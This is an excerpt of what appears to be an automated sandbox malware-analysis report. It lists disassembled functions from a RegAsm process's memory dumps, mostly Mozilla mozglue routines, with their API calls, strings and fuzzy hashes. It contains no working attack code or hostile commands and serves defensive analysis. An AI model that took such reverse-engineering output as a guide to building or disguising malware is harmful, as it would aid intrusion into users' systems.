                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C71E100 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114threadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C71945E
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719470
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719482
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: __Init_thread_footer.LIBCMT ref: 6C71949F
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71E12F
                                                                                                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,6C71E084,00000000), ref: 6C71E137
                                                                                                                                                                                                                                                      • Part of subcall function 6C7194D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7194EE
                                                                                                                                                                                                                                                      • Part of subcall function 6C7194D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C719508
                                                                                                                                                                                                                                                    • ?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE ref: 6C71E196
                                                                                                                                                                                                                                                    • ?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE(?,?,?,?,?,?,?,?), ref: 6C71E1E9
                                                                                                                                                                                                                                                      • Part of subcall function 6C7199A0: GetCurrentThreadId.KERNEL32 ref: 6C7199C1
                                                                                                                                                                                                                                                      • Part of subcall function 6C7199A0: AcquireSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C7199CE
                                                                                                                                                                                                                                                      • Part of subcall function 6C7199A0: ReleaseSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C7199F8
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • [I %d/%d] WriteProfileToJSONWriter, xrefs: 6C71E13F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: getenv$?profiler_stream_json_for_this_process@baseprofiler@mozilla@@CurrentExclusiveLockSpliceableThreadWriter@12@$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                                                                                                    • String ID: [I %d/%d] WriteProfileToJSONWriter
                                                                                                                                                                                                                                                    • API String ID: 2491745604-3904374701
                                                                                                                                                                                                                                                    • Opcode ID: cd49332c224478835108aa024b539d53afe91c29f8d49d283574d10b6b878f23
                                                                                                                                                                                                                                                    • Instruction ID: 3fc6cf1462dcb626912427a689fcab4e8d60fcd87e7d1cc393a1b5f61baa87c5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cd49332c224478835108aa024b539d53afe91c29f8d49d283574d10b6b878f23
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D53128B1A087049FC3009F68C6043AAF7E5AFDA708F58C43EE8944BF41EB708909C796
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0040F5F0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 104COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 0040F60A
                                                                                                                                                                                                                                                      • Part of subcall function 0041F4C0: std::exception::exception.LIBCMT ref: 0041F4D5
                                                                                                                                                                                                                                                      • Part of subcall function 0041F4C0: __CxxThrowException@8.LIBCMT ref: 0041F4EA
                                                                                                                                                                                                                                                      • Part of subcall function 0041F4C0: std::exception::exception.LIBCMT ref: 0041F4FB
                                                                                                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 0040F647
                                                                                                                                                                                                                                                      • Part of subcall function 0041F473: std::exception::exception.LIBCMT ref: 0041F488
                                                                                                                                                                                                                                                      • Part of subcall function 0041F473: __CxxThrowException@8.LIBCMT ref: 0041F49D
                                                                                                                                                                                                                                                      • Part of subcall function 0041F473: std::exception::exception.LIBCMT ref: 0041F4AE
                                                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040F6A8
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$memcpy
                                                                                                                                                                                                                                                    • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                    • API String ID: 85833692-4289949731
                                                                                                                                                                                                                                                    • Opcode ID: 2a8c8303ee0056b0c0db705fa9d64c2a5b9a8cf8feb4cf9eb6077d2dae3d4a41
                                                                                                                                                                                                                                                    • Instruction ID: 1df43c8fdcb61b4b7a7144954488fa2be970e96293369bb1394909fd85caeaf9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2a8c8303ee0056b0c0db705fa9d64c2a5b9a8cf8feb4cf9eb6077d2dae3d4a41
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3331C8323042109BC7309A5CF840B6AF399DBA1764F25093FF541DB7E1D67A9C4687AD
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C70F440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C70F480
                                                                                                                                                                                                                                                      • Part of subcall function 6C6DF100: LoadLibraryW.KERNEL32(shell32,?,6C74D020), ref: 6C6DF122
                                                                                                                                                                                                                                                      • Part of subcall function 6C6DF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C6DF132
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 6C70F555
                                                                                                                                                                                                                                                      • Part of subcall function 6C6E14B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C6E1248,6C6E1248,?), ref: 6C6E14C9
                                                                                                                                                                                                                                                      • Part of subcall function 6C6E14B0: memcpy.VCRUNTIME140(?,6C6E1248,00000000,?,6C6E1248,?), ref: 6C6E14EF
                                                                                                                                                                                                                                                      • Part of subcall function 6C6DEEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C6DEEE3
                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32 ref: 6C70F4FD
                                                                                                                                                                                                                                                    • GetFileInformationByHandle.KERNEL32(00000000), ref: 6C70F523
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
                                                                                                                                                                                                                                                    • String ID: \oleacc.dll
                                                                                                                                                                                                                                                    • API String ID: 2595878907-3839883404
                                                                                                                                                                                                                                                    • Opcode ID: ff37d21b700420d776b509b95bfe34b9a061bf2fcdf7139489947cf44128b5e4
                                                                                                                                                                                                                                                    • Instruction ID: 8a2f69cd5df722bffac6e09ecf230b8647b03781d5b4cc76e015b73abc6ee023
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff37d21b700420d776b509b95bfe34b9a061bf2fcdf7139489947cf44128b5e4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9541C2707087109FE721DF28C984B9BB7F4AF85318F504A2CF59183650EB70EA49CB96
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C71E020 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76threadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C71945E
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719470
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719482
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: __Init_thread_footer.LIBCMT ref: 6C71949F
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71E047
                                                                                                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C71E04F
                                                                                                                                                                                                                                                      • Part of subcall function 6C7194D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7194EE
                                                                                                                                                                                                                                                      • Part of subcall function 6C7194D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C719508
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C71E09C
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C71E0B0
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • [I %d/%d] profiler_get_profile, xrefs: 6C71E057
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: getenv$free$CurrentInit_thread_footerThread__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                                                                                                    • String ID: [I %d/%d] profiler_get_profile
                                                                                                                                                                                                                                                    • API String ID: 1832963901-4276087706
                                                                                                                                                                                                                                                    • Opcode ID: c99911afe8d4f1a3db929d85eac3d84b1986a1922f62d03a2d05978ab1e4f0cc
                                                                                                                                                                                                                                                    • Instruction ID: 5803a62afdc92c92eb04c28ac14a87b4175ef11aa01e8835f279032155b10ea6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c99911afe8d4f1a3db929d85eac3d84b1986a1922f62d03a2d05978ab1e4f0cc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F6218074B041089FDF04DF64D95CAAEB7B5AF89308F684428ED0AA7B40DB35A909C7A1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C7374A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 6C737526
                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C737566
                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C737597
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Init_thread_footer$ErrorLast
                                                                                                                                                                                                                                                    • String ID: UnmapViewOfFile2$kernel32.dll
                                                                                                                                                                                                                                                    • API String ID: 3217676052-1401603581
                                                                                                                                                                                                                                                    • Opcode ID: 976c2301cb67bd8ca10828bdc10b4fc6c388e687c452cb9adc7bf495618e0b6c
                                                                                                                                                                                                                                                    • Instruction ID: f595216f5157607489524471686c9720f76b7893427939335ff498e3111de504
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 976c2301cb67bd8ca10828bdc10b4fc6c388e687c452cb9adc7bf495618e0b6c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D421F571B00511EFDB188FB98F18E5A33B5EB46335FC41938E40A47F81DF22B91186A6
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C737930 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C6EBF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6C737A3F), ref: 6C6EBF11
                                                                                                                                                                                                                                                      • Part of subcall function 6C6EBF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6C737A3F), ref: 6C6EBF5D
                                                                                                                                                                                                                                                      • Part of subcall function 6C6EBF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6C737A3F), ref: 6C6EBF7E
                                                                                                                                                                                                                                                    • ?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000012,00000000), ref: 6C737968
                                                                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_J@Z.MSVCP140(6C73A264,6C73A264), ref: 6C73799A
                                                                                                                                                                                                                                                      • Part of subcall function 6C6E9830: free.MOZGLUE(?,?,?,6C737ABE), ref: 6C6E985B
                                                                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6C7379E0
                                                                                                                                                                                                                                                    • ??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6C7379E8
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
                                                                                                                                                                                                                                                    • String ID: tl
                                                                                                                                                                                                                                                    • API String ID: 3421697164-2603243157
                                                                                                                                                                                                                                                    • Opcode ID: b3fe2835a5d043ba59d3c2babf8a61b3650e9a0477d8cc1a8d247150d99c362a
                                                                                                                                                                                                                                                    • Instruction ID: 77223668f3d8964e106855feee4e6792b71719e452b04646056d2fbc48641bc0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b3fe2835a5d043ba59d3c2babf8a61b3650e9a0477d8cc1a8d247150d99c362a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A7214A756043049BCB04DF18D889AAEFBE5EF89314F44882DE84A87361DB30A909CB96
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C73A7A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75F770,-00000001,?,6C74E330,?,6C6FBDF7), ref: 6C73A7AF
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,accelerator.dll,?,6C6FBDF7), ref: 6C73A7C2
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000018,?,6C6FBDF7), ref: 6C73A7E4
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75F770), ref: 6C73A80A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeavemoz_xmallocstrcmp
                                                                                                                                                                                                                                                    • String ID: accelerator.dll
                                                                                                                                                                                                                                                    • API String ID: 2442272132-2426294810
                                                                                                                                                                                                                                                    • Opcode ID: 8e6505f7cd2057c9b13b55fc5899fb0b4bcb3f565150627a3a692a9d533fe06a
                                                                                                                                                                                                                                                    • Instruction ID: eff542c59b663fa8bbf936cae32d67ac655d47c38d4edc6b38aba97c3386f92e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e6505f7cd2057c9b13b55fc5899fb0b4bcb3f565150627a3a692a9d533fe06a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 08018FB17013149F9F04DFA9D9C9C657BB8FB8A325784847AE8098B712DF70A804CBA1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6DF0A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 26libraryloaderCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(ole32,?,6C6DEE51,?), ref: 6C6DF0B2
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CoTaskMemFree), ref: 6C6DF0C2
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • ole32, xrefs: 6C6DF0AD
                                                                                                                                                                                                                                                    • Could not load ole32 - will not free with CoTaskMemFree, xrefs: 6C6DF0DC
                                                                                                                                                                                                                                                    • Could not find CoTaskMemFree, xrefs: 6C6DF0E3
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                    • String ID: Could not find CoTaskMemFree$Could not load ole32 - will not free with CoTaskMemFree$ole32
                                                                                                                                                                                                                                                    • API String ID: 2574300362-1578401391
                                                                                                                                                                                                                                                    • Opcode ID: fecf6228d487f6584b6f8b77e5ad3275e1ce0d3cb766083e8b50bb7da6bd2214
                                                                                                                                                                                                                                                    • Instruction ID: ce4de0e25f77c673496b1407e195bfa1107aebdc49e5921d5b8775b4942293ee
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fecf6228d487f6584b6f8b77e5ad3275e1ce0d3cb766083e8b50bb7da6bd2214
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5FE048707453019BDF046E666D2863637FCAB5630A795C539E512D2E40EE60F510C616
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C7100D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(wintrust.dll,?,6C6E7235), ref: 6C7100D8
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle2), ref: 6C7100F7
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,6C6E7235), ref: 6C71010E
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • wintrust.dll, xrefs: 6C7100D3
                                                                                                                                                                                                                                                    • CryptCATAdminCalcHashFromFileHandle2, xrefs: 6C7100F1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                    • String ID: CryptCATAdminCalcHashFromFileHandle2$wintrust.dll
                                                                                                                                                                                                                                                    • API String ID: 145871493-2559046807
                                                                                                                                                                                                                                                    • Opcode ID: 1415a6483186875f6c8287cd9ce3f7da8e8f2f19c2cbb1113a2b1fc72fe9aec1
                                                                                                                                                                                                                                                    • Instruction ID: 81f0b79a1f6757368a18fcbd35bf6f421a6c29d1145b9a9a0df04a3e2f92b343
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1415a6483186875f6c8287cd9ce3f7da8e8f2f19c2cbb1113a2b1fc72fe9aec1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DCE012703093459BEF009F268B0A7263AFCB70A295FE84439AA0A81B00DFB4B0609A10
                                                                                                                                                                                                                                                    Uniqueness

